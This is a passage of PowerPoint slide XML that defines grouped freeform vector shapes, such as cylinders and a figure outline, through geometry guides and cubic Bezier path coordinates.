                        <a:pt x="2" y="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8" name="Freeform 2997"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2205" y="4429"/>
                  <a:ext cx="104" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 22 w 44"/>
                    <a:gd name="T1" fmla="*/ 0 h 12"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 5 h 12"/>
                    <a:gd name="T4" fmla="*/ 0 w 44"/>
                    <a:gd name="T5" fmla="*/ 7 h 12"/>
                    <a:gd name="T6" fmla="*/ 22 w 44"/>
                    <a:gd name="T7" fmla="*/ 12 h 12"/>
                    <a:gd name="T8" fmla="*/ 44 w 44"/>
                    <a:gd name="T9" fmla="*/ 7 h 12"/>
                    <a:gd name="T10" fmla="*/ 44 w 44"/>
                    <a:gd name="T11" fmla="*/ 5 h 12"/>
                    <a:gd name="T12" fmla="*/ 22 w 44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12">
                      <a:moveTo>
                        <a:pt x="22" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="0" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="11" y="12"/>
                        <a:pt x="22" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="12"/>
                        <a:pt x="42" y="10"/>
                        <a:pt x="44" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="6"/>
                        <a:pt x="44" y="6"/>
                        <a:pt x="44" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="2"/>
                        <a:pt x="33" y="0"/>
                        <a:pt x="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06" name="Group 2998"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2422" y="4249"/>
                <a:ext cx="123" cy="690"/>
                <a:chOff x="2422" y="4249"/>
                <a:chExt cx="123" cy="690"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1007" name="Freeform 2999"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2432" y="4303"/>
                  <a:ext cx="0" cy="5"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 h 2"/>
                    <a:gd name="T1" fmla="*/ 2 h 2"/>
                    <a:gd name="T2" fmla="*/ 0 h 2"/>
                    <a:gd name="T3" fmla="*/ 1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1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08" name="Freeform 3000"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2535" y="4303"/>
                  <a:ext cx="0" cy="5"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 h 2"/>
                    <a:gd name="T1" fmla="*/ 0 h 2"/>
                    <a:gd name="T2" fmla="*/ 2 h 2"/>
                    <a:gd name="T3" fmla="*/ 1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0" y="2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09" name="Freeform 3001"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2424" y="4268"/>
                  <a:ext cx="121" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 51 w 51"/>
                    <a:gd name="T1" fmla="*/ 0 h 15"/>
                    <a:gd name="T2" fmla="*/ 25 w 51"/>
                    <a:gd name="T3" fmla="*/ 6 h 15"/>
                    <a:gd name="T4" fmla="*/ 0 w 51"/>
                    <a:gd name="T5" fmla="*/ 1 h 15"/>
                    <a:gd name="T6" fmla="*/ 3 w 51"/>
                    <a:gd name="T7" fmla="*/ 13 h 15"/>
                    <a:gd name="T8" fmla="*/ 3 w 51"/>
                    <a:gd name="T9" fmla="*/ 15 h 15"/>
                    <a:gd name="T10" fmla="*/ 25 w 51"/>
                    <a:gd name="T11" fmla="*/ 10 h 15"/>
                    <a:gd name="T12" fmla="*/ 47 w 51"/>
                    <a:gd name="T13" fmla="*/ 15 h 15"/>
                    <a:gd name="T14" fmla="*/ 47 w 51"/>
                    <a:gd name="T15" fmla="*/ 14 h 15"/>
                    <a:gd name="T16" fmla="*/ 51 w 51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1" h="15">
                      <a:moveTo>
                        <a:pt x="51" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="4"/>
                        <a:pt x="38" y="6"/>
                        <a:pt x="25" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="6"/>
                        <a:pt x="2" y="4"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="3" y="8"/>
                        <a:pt x="3" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="13"/>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="12"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="25" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="10"/>
                        <a:pt x="46" y="13"/>
                        <a:pt x="47" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="15"/>
                        <a:pt x="47" y="14"/>
                        <a:pt x="47" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="9"/>
                        <a:pt x="50" y="3"/>
                        <a:pt x="5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0" name="Freeform 3002"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2432" y="4308"/>
                  <a:ext cx="103" cy="631"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 22 w 44"/>
                    <a:gd name="T1" fmla="*/ 5 h 267"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 0 h 267"/>
                    <a:gd name="T4" fmla="*/ 0 w 44"/>
                    <a:gd name="T5" fmla="*/ 0 h 267"/>
                    <a:gd name="T6" fmla="*/ 0 w 44"/>
                    <a:gd name="T7" fmla="*/ 245 h 267"/>
                    <a:gd name="T8" fmla="*/ 22 w 44"/>
                    <a:gd name="T9" fmla="*/ 267 h 267"/>
                    <a:gd name="T10" fmla="*/ 44 w 44"/>
                    <a:gd name="T11" fmla="*/ 245 h 267"/>
                    <a:gd name="T12" fmla="*/ 44 w 44"/>
                    <a:gd name="T13" fmla="*/ 0 h 267"/>
                    <a:gd name="T14" fmla="*/ 44 w 44"/>
                    <a:gd name="T15" fmla="*/ 0 h 267"/>
                    <a:gd name="T16" fmla="*/ 22 w 44"/>
                    <a:gd name="T17" fmla="*/ 5 h 2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4" h="267">
                      <a:moveTo>
                        <a:pt x="22" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="5"/>
                        <a:pt x="2" y="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4"/>
                        <a:pt x="0" y="245"/>
                        <a:pt x="0" y="245"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="249"/>
                        <a:pt x="1" y="267"/>
                        <a:pt x="22" y="267"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="267"/>
                        <a:pt x="44" y="249"/>
                        <a:pt x="44" y="245"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="245"/>
                        <a:pt x="44" y="28"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="0"/>
                        <a:pt x="44" y="0"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="3"/>
                        <a:pt x="33" y="5"/>
                        <a:pt x="22" y="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1" name="Freeform 3003"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2422" y="4249"/>
                  <a:ext cx="123" cy="33"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 52"/>
                    <a:gd name="T1" fmla="*/ 8 h 14"/>
                    <a:gd name="T2" fmla="*/ 52 w 52"/>
                    <a:gd name="T3" fmla="*/ 7 h 14"/>
                    <a:gd name="T4" fmla="*/ 26 w 52"/>
                    <a:gd name="T5" fmla="*/ 0 h 14"/>
                    <a:gd name="T6" fmla="*/ 0 w 52"/>
                    <a:gd name="T7" fmla="*/ 7 h 14"/>
                    <a:gd name="T8" fmla="*/ 1 w 52"/>
                    <a:gd name="T9" fmla="*/ 9 h 14"/>
                    <a:gd name="T10" fmla="*/ 26 w 52"/>
                    <a:gd name="T11" fmla="*/ 14 h 14"/>
                    <a:gd name="T12" fmla="*/ 52 w 52"/>
                    <a:gd name="T13" fmla="*/ 8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4">
                      <a:moveTo>
                        <a:pt x="52" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="8"/>
                        <a:pt x="52" y="7"/>
                        <a:pt x="52" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="3"/>
                        <a:pt x="40" y="0"/>
                        <a:pt x="26" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="0"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="8"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="12"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="26" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="14"/>
                        <a:pt x="49" y="12"/>
                        <a:pt x="52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2" name="Freeform 3004"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2432" y="4292"/>
                  <a:ext cx="103" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 22 w 44"/>
                    <a:gd name="T1" fmla="*/ 0 h 12"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 5 h 12"/>
                    <a:gd name="T4" fmla="*/ 0 w 44"/>
                    <a:gd name="T5" fmla="*/ 7 h 12"/>
                    <a:gd name="T6" fmla="*/ 0 w 44"/>
                    <a:gd name="T7" fmla="*/ 7 h 12"/>
                    <a:gd name="T8" fmla="*/ 22 w 44"/>
                    <a:gd name="T9" fmla="*/ 12 h 12"/>
                    <a:gd name="T10" fmla="*/ 44 w 44"/>
                    <a:gd name="T11" fmla="*/ 7 h 12"/>
                    <a:gd name="T12" fmla="*/ 44 w 44"/>
                    <a:gd name="T13" fmla="*/ 7 h 12"/>
                    <a:gd name="T14" fmla="*/ 44 w 44"/>
                    <a:gd name="T15" fmla="*/ 5 h 12"/>
                    <a:gd name="T16" fmla="*/ 22 w 44"/>
                    <a:gd name="T17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4" h="12">
                      <a:moveTo>
                        <a:pt x="22" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="0" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6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2" y="10"/>
                        <a:pt x="11" y="12"/>
                        <a:pt x="22" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="12"/>
                        <a:pt x="42" y="10"/>
                        <a:pt x="44" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="7"/>
                        <a:pt x="44" y="7"/>
                        <a:pt x="44" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="6"/>
                        <a:pt x="44" y="6"/>
                        <a:pt x="44" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="3"/>
                        <a:pt x="33" y="0"/>
                        <a:pt x="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25" name="Group 2860"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5700413" y="3184362"/>
              <a:ext cx="211137" cy="504825"/>
              <a:chOff x="3735" y="3265"/>
              <a:chExt cx="468" cy="1120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1026" name="Freeform 2861"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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27" name="Freeform 2862"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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28" name="Freeform 2863"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3735" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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29" name="Freeform 2864"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3735" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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0" name="Freeform 2865"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3886" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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1" name="Freeform 2866"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3865" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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2" name="Freeform 2867"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3865" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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3" name="Freeform 2868"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3938" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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4" name="Freeform 2869"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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5" name="Freeform 2870"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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6" name="Freeform 2871"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3735" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
